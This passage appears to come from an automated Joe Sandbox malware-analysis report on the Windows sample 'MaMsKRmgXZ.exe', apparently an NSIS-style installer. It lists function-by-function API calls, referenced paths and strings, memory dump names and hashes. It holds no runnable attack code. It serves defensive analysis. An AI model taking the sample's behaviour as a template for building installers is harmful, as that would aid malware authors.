Part of subcall function 00406244: CharNextA.USER32(?,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
Part of subcall function 00406244: CharPrevA.USER32(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040473D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404758

Part of subcall function 004048B1: lstrlenA.KERNEL32(Nagari Setup: Installing,Nagari Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Nagari Setup: Installing), ref: 0040496A

Strings

A, xrefs: 0040461D
Call, xrefs: 0040465B, 00404660, 0040466B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 0040464A
Nagari Setup: Installing, xrefs: 004045F7, 0040465A

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Nagari Setup: Installing
API String ID: 2624150263-2741233494
Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407410,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 004021FA

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae
API String ID: 123533781-1223762460
Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A6D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A84
GetDlgItem.USER32(?,00000408), ref: 00404A91
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AE0
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
SetWindowLongA.USER32(?,000000FC,00405075), ref: 00404B11
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B23
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
SendMessageA.USER32(?,00001109,00000002), ref: 00404B4D
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B59
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B69
DeleteObject.GDI32(00000110), ref: 00404B6E
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B99
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BA5
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C3F
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C6F

Part of subcall function 0040409D: SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C83
GetWindowLongA.USER32(?,000000F0), ref: 00404CB1
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CBF
ShowWindow.USER32(?,00000005), ref: 00404CCF
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DCA
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E2F
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E44
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E68
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E88
ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
GlobalFree.KERNEL32(00000000), ref: 00404EAD
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F26
SendMessageA.USER32(?,00001102,?,?), ref: 00404FCF
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FDE
InvalidateRect.USER32(?,00000000,00000001), ref: 00404FFE
ShowWindow.USER32(?,00000000), ref: 0040504C
GetDlgItem.USER32(?,000003FE), ref: 00405057
ShowWindow.USER32(00000000), ref: 0040505E

Strings

M, xrefs: 00404C27
, xrefs: 00405036
N, xrefs: 00404D08

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004041D3 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040425E
GetDlgItem.USER32(00000000,000003E8), ref: 00404272
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404290
GetSysColor.USER32(?), ref: 004042A1
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042B0
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042BF
lstrlenA.KERNEL32(?), ref: 004042C2
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042D1
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042E6
GetDlgItem.USER32(?,0000040A), ref: 00404348
SendMessageA.USER32(00000000), ref: 0040434B
GetDlgItem.USER32(?,000003E8), ref: 00404376
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043B6
LoadCursorA.USER32(00000000,00007F02), ref: 004043C5
SetCursor.USER32(00000000), ref: 004043CE
LoadCursorA.USER32(00000000,00007F00), ref: 004043E4
SetCursor.USER32(00000000), ref: 004043E7
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404413
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404427

Strings

N, xrefs: 00404364
Call, xrefs: 004043A1

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DDA,?,?), ref: 00405C7A
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C83

Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405CA0
wsprintfA.USER32 ref: 00405CBE
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405CF9
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D08
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
GlobalFree.KERNEL32(00000000), ref: 00405DA7
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DAE

Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

Strings

[Rename], xrefs: 00405D28, 00405D3A
%s=%s, xrefs: 00405CB4

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00406244 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
CharNextA.USER32(?,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
CharPrevA.USER32(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE

Strings

"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00406280
*?|<>/":, xrefs: 0040628C
C:\Users\user\AppData\Local\Temp\, xrefs: 00406245

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4111895690
Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E

Uniqueness

Uniqueness Score: -1.00%

Function 004040CF Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040EC
GetSysColor.USER32(00000000), ref: 0040412A
SetTextColor.GDI32(?,00000000), ref: 00404136
SetBkMode.GDI32(?,?), ref: 00404142
GetSysColor.USER32(?), ref: 00404155
SetBkColor.GDI32(?,?), ref: 00404165
DeleteObject.GDI32(?), ref: 0040417F
CreateBrushIndirect.GDI32(?), ref: 00404189

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EC024D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 6EC01215: GlobalAlloc.KERNEL32(00000040,6EC01233,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC0121D

GlobalFree.KERNEL32(?), ref: 6EC025DE
GlobalFree.KERNEL32(00000000), ref: 6EC02618

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 862558c7285974d1b6fc66ca83dbea5d208b95b96f23ea16748873321a5753b0
Instruction ID: b4d0ddf96fbb7f047de9ed95e810fd8caf6a30ced834ef23d6ea6c385a2c3ac9
Opcode Fuzzy Hash: 862558c7285974d1b6fc66ca83dbea5d208b95b96f23ea16748873321a5753b0
Instruction Fuzzy Hash: A241C071108601EFDB098F99CDA8C6BB7BEFB86308B11492DF61197211F7339A05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004049BB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049D6
GetMessagePos.USER32 ref: 004049DE
ScreenToClient.USER32(?,?), ref: 004049F8
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A0A
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A30

Strings

f, xrefs: 00404A0C

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
